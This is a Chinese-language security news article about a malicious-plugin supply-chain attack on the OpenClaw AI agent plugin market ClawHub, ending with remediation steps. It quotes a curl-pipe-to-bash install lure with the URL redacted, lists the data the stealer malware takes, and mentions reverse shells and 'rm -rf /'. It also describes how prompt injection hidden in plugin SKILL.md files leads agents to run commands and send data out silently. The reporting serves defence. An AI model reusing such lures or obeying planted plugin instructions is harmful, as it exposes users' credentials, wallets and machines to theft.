你以为在用AI Skills插件,其实它在盗取你的一切

1184个恶意插件、13.5万台受感染设备、82个国家波及——这是AI Agent生态迄今最大规模的供应链攻击。

事件背景

2026年1月末至2月中旬，来自 Koi Security、Cisco、Snyk、Antiy CERT 和 VirusTotal 的安全研究人员几乎同时发出警报：OpenClaw 官方插件市场 ClawHub 遭到系统性投毒。

OpenClaw 是目前最受关注的个人 AI Agent 工具之一，而 ClawHub 则是其官方插件市场——用户可以像安装手机 App 一样，为自己的 AI 助手安装各种技能（Skill）：加密货币价格追踪、YouTube 摘要、代码审查……

然而，这个应用商店的排名第一的插件，是一款恶意软件。

触目惊心的数字

安全研究员 Oren Yomtov（Koi Security）使用 OpenClaw 机器人”Alex”对 2,857 个插件进行自动审计，标记了 341 个恶意插件。到2月16日，确认数量已增至 824 个，覆盖市场内逾 10,700 个插件。

此次攻击事件被命名为ClawHavoc。

攻击是如何运作的？

入门门槛：几乎为零

ClawHub 的发布机制极为宽松——任何人只需拥有一个注册超过一周的 GitHub 账号，就可以发布插件。无需代码签名，无需安全审查，没有沙箱隔离。攻击者只需提交一个 SKILL.md 文件和一个 GitHub 仓库即可。

精心伪装的诱饵

攻击者上传的恶意插件涵盖多个热门类别：

• 加密货币交易机器人

• Polymarket 预测市场工具

• YouTube 内容摘要

• 钱包追踪器

• Moltbook 集成助手

这些插件的文档外观专业，README 精心编写，名称经过刻意设计——其中不乏”错字仿冒”（typosquatting），如 clawhub、clawhubb、clawhubcli、cllawhub，与 npm 生态中的经典供应链攻击手法如出一辙。

ClickFix：一行命令，全盘沦陷

最主要的攻击手法名为ClickFix：在插件文档的“前置条件”章节中，诱导用户运行一段“初始化命令”：

curl -sL [恶意URL] | bash

执行这行命令，恶意安装程序便会悄然运行：

• macOS：下载一个521KB的通用 Mach-O 二进制文件，即 Atomic Stealer（AMOS）的变种。这是一款在暗网以每月500~1000美元出租的”恶意软件即服务”工具。

• Windows：下载一个密码保护的 ZIP 压缩包（openclaw-agent.zip，密码：”openclaw”）。密码保护是刻意为之——用于规避杀毒软件扫描。解压后是一个经 VMProtect 加壳的信息窃取程序。

你的数据，它全都要

Atomic Stealer 的窃取范围令人咋舌：

• 浏览器数据：Chrome、Safari、Firefox、Brave、Edge 的密码、Cookie、自动填充信息

• 60+ 种加密货币钱包：Phantom、MetaMask、Solana 等

• SSH 密钥Telegram 会话记录与聊天内容

• macOS Keychain 凭证

• .env 文件中的所有 API 密钥

• OpenClaw 配置文件（内含 LLM API 密钥）

• 桌面和文档目录下的所有文件

部分系统上，插件还会建立反向 Shell——攻击者由此获得对受害者机器的完整远程控制权，能够执行任意命令并长期潜伏。

更阴险的一层：AI 本身也被攻击了

91% 的恶意插件同时包含提示词注入（Prompt Injection）攻击。

这不仅是针对人类用户的攻击，攻击者同时把枪口瞄准了 AI 本身。

恶意插件在文档中嵌入隐藏指令，操控 AI Agent 静默执行 curl 命令、向外部服务器发送数据、绕过安全限制——用户全程无任何感知。AI Agent 本身成了攻击的帮凶。

这种“人机双矢量”的攻击方式，能同时绕过 AI 安全机制和传统安全工具，前所未见。

排名第一的插件：9个漏洞，2个严重级别

ClawHub 下载量最高的社区插件名为 “What Would Elon Do”。

Cisco AI Defense 团队用其插件扫描器对其分析，发现：

• 9 个安全漏洞，其中 2 个为严重（Critical）级别

• 漏洞一：通过静默网络请求，将用户数据发送至插件作者控制的外部服务器，用户毫不知情

• 漏洞二：直接提示词注入，强制 AI 助手绕过安全限制并在未经用户同意的情况下执行命令

更讽刺的是——该插件的排名是刷出来的，通过 4,000 次虚假下载推上榜首，再吸引真实用户基于信任大量安装。

事后查明，这个插件最初由安全研究员 Jamieson O’Reilly（Dvuln 创始人）创建，本意是为了演示 ClawHub 有多容易被利用。他后来加入 OpenClaw 团队担任首席安全顾问——但那时，伤害已经造成。

为什么比 npm 供应链攻击更危险？

Snyk 在其研究报告中将 ClawHub 定性为”AI Agent 的 npm 仓库”。供应链攻击的套路相似，但 ClawHub 的危险程度在三个维度上更甚：

① 默认权限更高

npm 包运行在 Node.js 沙箱中；ClawHub 插件继承了 Agent 的完整权限：Shell 访问、文件系统读写、凭证访问，乃至持久化内存修改。极端情况下，插件可以执行 rm -rf /。

② 文档本身就是武器

npm 攻击的恶意代码藏在 postinstall 脚本中；ClawHub 攻击的载体是 SKILL.md 文档本身。这是一个全新的攻击面——Snyk 将其称为”指令供应链”（Instructional Supply Chain）。

③ AI 可以被”策反”

提示词注入意味着 AI Agent 自身会成为不知情的帮凶。插件告诉 Agent 执行命令，而被设计成”乐于助人”的 Agent 会照做。它不只是运行代码——它会思考，并且拥有你数字生活的最高权限。

全球响应

事件引发国际社会高度关注：

• 比利时网络安全中心发布紧急安全公告

• 中国工信部发布安全预警

• 韩国 Kakao、Naver、Karrot Market 等企业全面封禁 OpenClaw

• SecurityScorecard 发现 33.8%的暴露 OpenClaw 实例与已知威胁行为者相关，涉及 Kimsuky 和 APT28 等组织

知名 AI 学者 Andrej Karpathy 称此事为”一堆垃圾”，并表示”绝对不建议在个人设备上运行”；Gary Marcus 将使用 OpenClaw 比作”把你的所有密码交给酒吧里的陌生人”。

OpenClaw 随后与 VirusTotal 合作扫描全部插件，下架被标记的恶意内容，并聘请 O’Reilly 担任安全顾问。OpenClaw 创始人 Peter Steinberger 此后加入 OpenAI，项目转由基金会运营，获得 OpenAI 财务支持。

如果你使用过 ClawHub，现在该怎么做？

Snyk 的建议直截了当：

“如果你在过去 48 小时内安装过 ClawHub CLI 插件，或按照可疑发布者的安装说明操作过，请默认认为你的机器已被攻陷。”

立即执行以下操作：

1.轮换所有凭证，修改所有密码

2.吊销并重新生成所有 API 密钥

3. 检查 SSH authorized_keys 文件

4.将加密货币转移到新钱包

5.在为 AI Agent 安装任何插件之前，认真评估其权限范围

写在最后

ClawHub 供应链攻击不是 AI Agent 生态系统的最后一次供应链攻击——它是第一次。

AI Agent 正在以超乎想象的速度获得对我们数字生活的访问权限：文件、邮件、密码、钱包、Shell。与此同时，围绕这个生态系统的安全基础设施还远未成熟。

“有用”和”安全”之间的张力，是 AI Agent 时代最核心的挑战之一。这次事件是一个残酷的提醒：在你授权 AI 替你做任何事之前，先想清楚它到底能做什么。

来源：Koi Security、Cisco、Snyk、VirusTotal、SecurityScorecard 等机构研究报告

原文：awesomeagents.ai